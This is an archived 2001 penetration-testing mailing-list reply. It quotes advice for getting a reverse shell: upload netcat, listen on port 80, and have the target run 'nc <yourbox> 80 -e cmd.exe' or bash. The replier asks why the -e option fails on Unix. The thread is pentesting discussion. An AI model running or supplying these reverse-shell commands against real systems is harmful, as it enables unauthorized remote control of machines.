Penetration Testing mailing list archives
Re: Server initiated remote shell
From: Greg Ardpic <itb () rootshell be>
Date: Sat, 22 Sep 2001 13:51:55 +0200 (CEST)
On Fri, 21 Sep 2001, Bill Pennington wrote:
> You want netcat, you can find it on packetstorm. What you will need to do first is build a CGI/ASP script to upload your code, assuming you can't just tftp it from the internal system. Then on your box execute:
>
>     nc -l -p 80
>
> On the remote server execute
>
>     nc <yourbox> 80 -e c:\winnt\system32\cmd.exe
>
> or /usr/bin/bash or whatever command interpreter is handy. You will then see a command prompt appear on your local box. Sounds like the hard part will be getting netcat on the box. Good luck!
Does this work on Unix machines? I have compiled netcat with -DGAPING_SECURITY_HOLE (so I could use the -e switch) but had no luck.

itb